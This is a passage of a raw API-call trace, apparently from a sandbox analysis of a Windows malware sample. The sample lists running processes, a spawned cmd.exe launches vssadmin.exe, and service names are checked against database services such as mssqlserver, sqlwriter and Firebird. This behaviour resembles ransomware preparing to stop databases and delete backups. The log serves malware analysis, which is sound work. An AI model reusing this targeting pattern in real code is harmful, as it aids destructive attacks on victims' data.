th32ProcessID=0x4d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0053.216] lstrlenW (lpString="svchost.exe") returned 11 [0053.216] Process32NextW (in: hSnapshot=0x17c, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0053.217] lstrlenW (lpString="taskeng.exe") returned 11 [0053.217] Process32NextW (in: hSnapshot=0x17c, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x130, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1cc, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0053.377] lstrlenW (lpString="taskhost.exe") returned 12 [0053.377] Process32NextW (in: hSnapshot=0x17c, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x78c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="called.exe")) returned 1 [0053.377] lstrlenW (lpString="called.exe") returned 10 [0053.377] Process32NextW (in: hSnapshot=0x17c, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="pal_bermuda_xhtml.exe")) returned 1 [0053.378] lstrlenW (lpString="pal_bermuda_xhtml.exe") returned 21 [0053.378] Process32NextW (in: hSnapshot=0x17c, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="analyst.exe")) returned 1 [0053.379] lstrlenW (lpString="analyst.exe") returned 11 [0053.379] Process32NextW (in: hSnapshot=0x17c, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="resolved_encourages_statewide.exe")) returned 1 [0053.379] lstrlenW (lpString="resolved_encourages_statewide.exe") returned 33 [0053.380] Process32NextW (in: hSnapshot=0x17c, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x618, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="wages.exe")) returned 1 [0053.380] lstrlenW (lpString="wages.exe") returned 9 [0053.380] Process32NextW (in: hSnapshot=0x17c, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x344, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="rand.exe")) returned 1 [0053.381] lstrlenW (lpString="rand.exe") returned 8 [0053.381] Process32NextW (in: hSnapshot=0x17c, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="vacations considered astrology.exe")) returned 1 [0053.382] lstrlenW (lpString="vacations considered astrology.exe") returned 34 [0053.382] Process32NextW (in: hSnapshot=0x17c, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x204, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="cottage.exe")) returned 1 [0053.382] lstrlenW (lpString="cottage.exe") returned 11 [0053.382] Process32NextW (in: hSnapshot=0x17c, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x724, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="pairs_spec.exe")) returned 1 [0053.383] lstrlenW (lpString="pairs_spec.exe") returned 14 [0053.383] Process32NextW (in: hSnapshot=0x17c, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="arthur cyber bid.exe")) returned 1 [0053.384] lstrlenW (lpString="arthur cyber bid.exe") returned 20 [0053.384] Process32NextW (in: hSnapshot=0x17c, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x688, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="observationshairy.exe")) returned 1 [0053.385] lstrlenW (lpString="observationshairy.exe") returned 21 [0053.385] Process32NextW (in: hSnapshot=0x17c, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="portland-workforce-patient.exe")) returned 1 [0053.385] lstrlenW (lpString="portland-workforce-patient.exe") returned 30 [0053.385] Process32NextW (in: hSnapshot=0x17c, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x15c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="spectrum.exe")) returned 1 [0053.386] lstrlenW (lpString="spectrum.exe") returned 12 [0053.386] Process32NextW (in: hSnapshot=0x17c, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="dies.exe")) returned 1 [0053.387] lstrlenW (lpString="dies.exe") returned 8 [0053.387] Process32NextW (in: hSnapshot=0x17c, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x320, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="configured.exe")) returned 1 [0053.387] lstrlenW (lpString="configured.exe") returned 14 [0053.387] Process32NextW (in: hSnapshot=0x17c, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="rememberkatrina.exe")) returned 1 [0053.388] lstrlenW (lpString="rememberkatrina.exe") returned 19 [0053.388] Process32NextW (in: hSnapshot=0x17c, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x488, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="fast.exe")) returned 1 [0053.389] lstrlenW (lpString="fast.exe") returned 8 [0053.389] Process32NextW (in: hSnapshot=0x17c, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="berkeley-challenges-binding.exe")) returned 1 [0053.390] lstrlenW (lpString="berkeley-challenges-binding.exe") returned 31 [0053.390] Process32NextW (in: hSnapshot=0x17c, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="review.exe")) returned 1 [0053.390] lstrlenW (lpString="review.exe") returned 10 [0053.390] Process32NextW (in: hSnapshot=0x17c, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x328, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="historybinding.exe")) returned 1 [0053.391] lstrlenW (lpString="historybinding.exe") returned 18 [0053.391] Process32NextW (in: hSnapshot=0x17c, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x274, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="pk task surge.exe")) returned 1 [0053.392] lstrlenW (lpString="pk task surge.exe") returned 17 [0053.392] Process32NextW (in: hSnapshot=0x17c, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0053.393] lstrlenW (lpString="WmiPrvSE.exe") returned 12 [0053.393] Process32NextW (in: hSnapshot=0x17c, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xa90, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="ivttvf.exe")) returned 1 [0053.393] lstrlenW (lpString="ivttvf.exe") returned 10 [0053.393] Process32NextW (in: hSnapshot=0x17c, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xa9c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xa90, pcPriClassBase=8, dwFlags=0x0, szExeFile="cmd.exe")) returned 1 [0053.394] lstrlenW (lpString="cmd.exe") returned 7 [0053.394] Process32NextW (in: hSnapshot=0x17c, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xac0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x188, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0053.395] lstrlenW (lpString="conhost.exe") returned 11 [0053.395] Process32NextW (in: hSnapshot=0x17c, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xaf8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0xa9c, pcPriClassBase=8, dwFlags=0x0, szExeFile="vssadmin.exe")) returned 1 [0053.396] lstrlenW (lpString="vssadmin.exe") returned 12 [0053.396] Process32NextW (in: hSnapshot=0x17c, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xbbc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="VSSVC.exe")) returned 1 [0053.396] lstrlenW (lpString="VSSVC.exe") returned 9 [0053.396] Process32NextW (in: hSnapshot=0x17c, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xbdc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0053.397] lstrlenW (lpString="svchost.exe") returned 11 [0053.397] Process32NextW (in: hSnapshot=0x17c, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xbdc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 0 [0053.398] CloseHandle (hObject=0x17c) returned 1 [0053.398] Sleep (dwMilliseconds=0x1f4) [0054.237] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x4) returned 0x5efee0 [0054.237] EnumServicesStatusExW (in: hSCManager=0x5efee0, InfoLevel=0x0, dwServiceType=0x30, dwServiceState=0x1, lpServices=0x0, cbBufSize=0x0, pcbBytesNeeded=0x217ff44, lpServicesReturned=0x217ff5c, lpResumeHandle=0x0, pszGroupName=0x0 | out: lpServices=0x0, pcbBytesNeeded=0x217ff44, lpServicesReturned=0x217ff5c, lpResumeHandle=0x0) returned 0 [0054.238] GetLastError () returned 0xea [0054.238] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x12c6) returned 0x3f740a8 [0054.238] EnumServicesStatusExW (in: hSCManager=0x5efee0, InfoLevel=0x0, dwServiceType=0x30, dwServiceState=0x1, lpServices=0x3f740a8, cbBufSize=0x12c6, pcbBytesNeeded=0x217ff44, lpServicesReturned=0x217ff5c, lpResumeHandle=0x0, pszGroupName=0x0 | out: lpServices=0x3f740a8, pcbBytesNeeded=0x217ff44, lpServicesReturned=0x217ff5c, lpResumeHandle=0x0) returned 1 [0054.239] CloseServiceHandle (hSCObject=0x5efee0) returned 1 [0054.239] lstrlenW (lpString="Appinfo") returned 7 [0054.239] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Appinfo") returned 1 [0054.239] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Appinfo") returned 1 [0054.239] lstrcmpiW (lpString1="sqlwriter", lpString2="Appinfo") returned 1 [0054.239] lstrcmpiW (lpString1="mssqlserver", lpString2="Appinfo") returned 1 [0054.239] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Appinfo") returned 1 [0054.239] lstrlenW (lpString="AudioEndpointBuilder") returned 20 [0054.239] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="AudioEndpointBuilder") returned 1 [0054.239] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="AudioEndpointBuilder") returned 1 [0054.239] lstrcmpiW (lpString1="sqlwriter", lpString2="AudioEndpointBuilder") returned 1 [0054.239] lstrcmpiW (lpString1="mssqlserver", lpString2="AudioEndpointBuilder") returned 1 [0054.239] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="AudioEndpointBuilder") returned 1 [0054.239] lstrlenW (lpString="AudioSrv") returned 8 [0054.239] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="AudioSrv") returned 1 [0054.239] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="AudioSrv") returned 1 [0054.239] lstrcmpiW (lpString1="sqlwriter", lpString2="AudioSrv") returned 1 [0054.239] lstrcmpiW (lpString1="mssqlserver", lpString2="AudioSrv") returned 1 [0054.239] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="AudioSrv") returned 1 [0054.239] lstrlenW (lpString="BFE") returned 3 [0054.239] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="BFE") returned 1 [0054.239] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="BFE") returned 1 [0054.239] lstrcmpiW (lpString1="sqlwriter", lpString2="BFE") returned 1 [0054.239] lstrcmpiW (lpString1="mssqlserver", lpString2="BFE") returned 1 [0054.239] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="BFE") returned 1 [0054.239] lstrlenW (lpString="CryptSvc") returned 8 [0054.240] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="CryptSvc") returned 1 [0054.240] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="CryptSvc") returned 1 [0054.240] lstrcmpiW (lpString1="sqlwriter", lpString2="CryptSvc") returned 1 [0054.240] lstrcmpiW (lpString1="mssqlserver", lpString2="CryptSvc") returned 1 [0054.240] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="CryptSvc") returned 1 [0054.240] lstrlenW (lpString="CscService") returned 10 [0054.240] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="CscService") returned 1 [0054.240] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="CscService") returned 1 [0054.240] lstrcmpiW (lpString1="sqlwriter", lpString2="CscService") returned 1 [0054.240] lstrcmpiW (lpString1="mssqlserver", lpString2="CscService") returned 1 [0054.240] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="CscService") returned 1 [0054.240] lstrlenW (lpString="DcomLaunch") returned 10 [0054.240] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DcomLaunch") returned 1 [0054.240] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DcomLaunch") returned 1 [0054.240] lstrcmpiW (lpString1="sqlwriter", lpString2="DcomLaunch") returned 1 [0054.240] lstrcmpiW (lpString1="mssqlserver", lpString2="DcomLaunch") returned 1 [0054.240] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DcomLaunch") returned 1 [0054.240] lstrlenW (lpString="Dhcp") returned 4 [0054.240] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Dhcp") returned 1 [0054.240] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Dhcp") returned 1 [0054.240] lstrcmpiW (lpString1="sqlwriter", lpString2="Dhcp") returned 1 [0054.240] lstrcmpiW (lpString1="mssqlserver", lpString2="Dhcp") returned 1 [0054.240] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Dhcp") returned 1 [0054.240] lstrlenW (lpString="Dnscache") returned 8 [0054.240] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Dnscache") returned 1 [0054.240] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Dnscache") returned 1 [0054.240] lstrcmpiW (lpString1="sqlwriter", lpString2="Dnscache") returned 1 [0054.240] lstrcmpiW (lpString1="mssqlserver", lpString2="Dnscache") returned 1 [0054.240] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Dnscache") returned 1 [0054.240] lstrlenW (lpString="DPS") returned 3 [0054.240] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DPS") returned 1 [0054.240] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DPS") returned 1 [0054.240] lstrcmpiW (lpString1="sqlwriter", lpString2="DPS") returned 1 [0054.240] lstrcmpiW (lpString1="mssqlserver", lpString2="DPS") returned 1 [0054.240] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DPS") returned 1 [0054.241] lstrlenW (lpString="eventlog") returned 8 [0054.241] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="eventlog") returned 1 [0054.241] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="eventlog") returned 1 [0054.241] lstrcmpiW (lpString1="sqlwriter", lpString2="eventlog") returned 1 [0054.241] lstrcmpiW (lpString1="mssqlserver", lpString2="eventlog") returned 1 [0054.241] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="eventlog") returned 1 [0054.241] lstrlenW (lpString="EventSystem") returned 11 [0054.241] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="EventSystem") returned 1 [0054.241] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="EventSystem") returned 1 [0054.241] lstrcmpiW (lpString1="sqlwriter", lpString2="EventSystem") returned 1 [0054.241] lstrcmpiW (lpString1="mssqlserver", lpString2="EventSystem") returned 1 [0054.241] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="EventSystem") returned 1 [0054.241] lstrlenW (lpString="gpsvc") returned 5 [0054.241] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="gpsvc") returned -1 [0054.241] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="gpsvc") returned -1 [0054.241] lstrcmpiW (lpString1="sqlwriter", lpString2="gpsvc") returned 1 [0054.241] lstrcmpiW (lpString1="mssqlserver", lpString2="gpsvc") returned 1 [0054.241] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="gpsvc") returned 1 [0054.241] lstrlenW (lpString="iphlpsvc") returned 8 [0054.241] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="iphlpsvc") returned -1 [0054.241] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="iphlpsvc") returned -1 [0054.241] lstrcmpiW (lpString1="sqlwriter", lpString2="iphlpsvc") returned 1 [0054.241] lstrcmpiW (lpString1="mssqlserver", lpString2="iphlpsvc") returned 1 [0054.241] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="iphlpsvc") returned 1 [0054.241] lstrlenW (lpString="LanmanServer") returned 12 [0054.241] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="LanmanServer") returned -1 [0054.241] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="LanmanServer") returned -1 [0054.241] lstrcmpiW (lpString1="sqlwriter", lpString2="LanmanServer") returned 1 [0054.241] lstrcmpiW (lpString1="mssqlserver", lpString2="LanmanServer") returned 1 [0054.241] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="LanmanServer") returned 1 [0054.241] lstrlenW (lpString="LanmanWorkstation") returned 17 [0054.241] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="LanmanWorkstation") returned -1 [0054.241] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="LanmanWorkstation") returned -1 [0054.241] lstrcmpiW (lpString1="sqlwriter", lpString2="LanmanWorkstation") returned 1 [0054.242] lstrcmpiW (lpString1="mssqlserver", lpString2="LanmanWorkstation") returned 1 [0054.242] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="LanmanWorkstation") returned 1 [0054.242] lstrlenW (lpString="lmhosts") returned 7 [0054.242] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="lmhosts") returned -1 [0054.242] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="lmhosts") returned -1 [0054.242] lstrcmpiW (lpString1="sqlwriter", lpString2="lmhosts") returned 1 [0054.242] lstrcmpiW (lpString1="mssqlserver", lpString2="lmhosts") returned 1 [0054.242] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="lmhosts") returned 1 [0054.242] lstrlenW (lpString="MMCSS") returned 5 [0054.242] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="MMCSS") returned -1 [0054.242] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="MMCSS") returned -1 [0054.242] lstrcmpiW (lpString1="sqlwriter", lpString2="MMCSS") returned 1 [0054.242] lstrcmpiW (lpString1="mssqlserver", lpString2="MMCSS") returned 1 [0054.242] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="MMCSS") returned 1 [0054.242] lstrlenW (lpString="MpsSvc") returned 6 [0054.242] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="MpsSvc") returned -1 [0054.242] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="MpsSvc") returned -1 [0054.242] lstrcmpiW (lpString1="sqlwriter", lpString2="MpsSvc") returned 1 [0054.242] lstrcmpiW (lpString1="mssqlserver", lpString2="MpsSvc") returned 1 [0054.242] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="MpsSvc") returned 1 [0054.242] lstrlenW (lpString="Netman") returned 6 [0054.242] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Netman") returned -1 [0054.242] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Netman") returned -1 [0054.242] lstrcmpiW (lpString1="sqlwriter", lpString2="Netman") returned 1 [0054.242] lstrcmpiW (lpString1="mssqlserver", lpString2="Netman") returned -1 [0054.242] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Netman") returned 1 [0054.242] lstrlenW (lpString="netprofm") returned 8 [0054.242] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="netprofm") returned -1 [0054.242] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="netprofm") returned -1 [0054.242] lstrcmpiW (lpString1="sqlwriter", lpString2="netprofm") returned 1 [0054.242] lstrcmpiW (lpString1="mssqlserver", lpString2="netprofm") returned -1 [0054.242] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="netprofm") returned 1 [0054.242] lstrlenW (lpString="NlaSvc") returned 6 [0054.242] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="NlaSvc") returned -1 [0054.242] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="NlaSvc") returned -1 [0054.242] lstrcmpiW (lpString1="sqlwriter", lpString2="NlaSvc") returned 1 [0054.243] lstrcmpiW (lpString1="mssqlserver", lpString2="NlaSvc") returned -1 [0054.243] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="NlaSvc") returned 1 [0054.243] lstrlenW (lpString="nsi") returned 3 [0054.243] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="nsi") returned -1 [0054.243] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="nsi") returned -1 [0054.243] lstrcmpiW (lpString1="sqlwriter", lpString2="nsi") returned 1 [0054.243] lstrcmpiW (lpString1="mssqlserver", lpString2="nsi") returned -1 [0054.243] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="nsi") returned 1 [0054.243] lstrlenW (lpString="PcaSvc") returned 6 [0054.243] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="PcaSvc") returned -1 [0054.243] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="PcaSvc") returned -1 [0054.243] lstrcmpiW (lpString1="sqlwriter", lpString2="PcaSvc") returned 1 [0054.243] lstrcmpiW (lpString1="mssqlserver", lpString2="PcaSvc") returned -1 [0054.243] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="PcaSvc") returned 1 [0054.243] lstrlenW (lpString="PlugPlay") returned 8 [0054.243] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="PlugPlay") returned -1 [0054.243] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="PlugPlay") returned -1 [0054.243] lstrcmpiW (lpString1="sqlwriter", lpString2="PlugPlay") returned 1 [0054.243] lstrcmpiW (lpString1="mssqlserver", lpString2="PlugPlay") returned -1 [0054.243] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="PlugPlay") returned 1 [0054.243] lstrlenW (lpString="Power") returned 5 [0054.243] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Power") returned -1 [0054.243] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Power") returned -1 [0054.243] lstrcmpiW (lpString1="sqlwriter", lpString2="Power") returned 1 [0054.243] lstrcmpiW (lpString1="mssqlserver", lpString2="Power") returned -1 [0054.243] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Power") returned 1 [0054.243] lstrlenW (lpString="ProfSvc") returned 7 [0054.243] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ProfSvc") returned -1 [0054.243] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ProfSvc") returned -1 [0054.243] lstrcmpiW (lpString1="sqlwriter", lpString2="ProfSvc") returned 1 [0054.243] lstrcmpiW (lpString1="mssqlserver", lpString2="ProfSvc") returned -1 [0054.243] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ProfSvc") returned 1 [0054.243] lstrlenW (lpString="RpcEptMapper") returned 12 [0054.243] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="RpcEptMapper") returned -1 [0054.243] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="RpcEptMapper") returned -1 [0054.243] lstrcmpiW (lpString1="sqlwriter", lpString2="RpcEptMapper") returned 1 [0054.244] lstrcmpiW (lpString1="mssqlserver", lpString2="RpcEptMapper") returned -1 [0054.244] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="RpcEptMapper") returned 1 [0054.244] lstrlenW (lpString="RpcSs") returned 5 [0054.244] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="RpcSs") returned -1 [0054.244] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="RpcSs") returned -1 [0054.244] lstrcmpiW (lpString1="sqlwriter", lpString2="RpcSs") returned 1 [0054.244] lstrcmpiW (lpString1="mssqlserver", lpString2="RpcSs") returned -1 [0054.244] lstrcmpiW 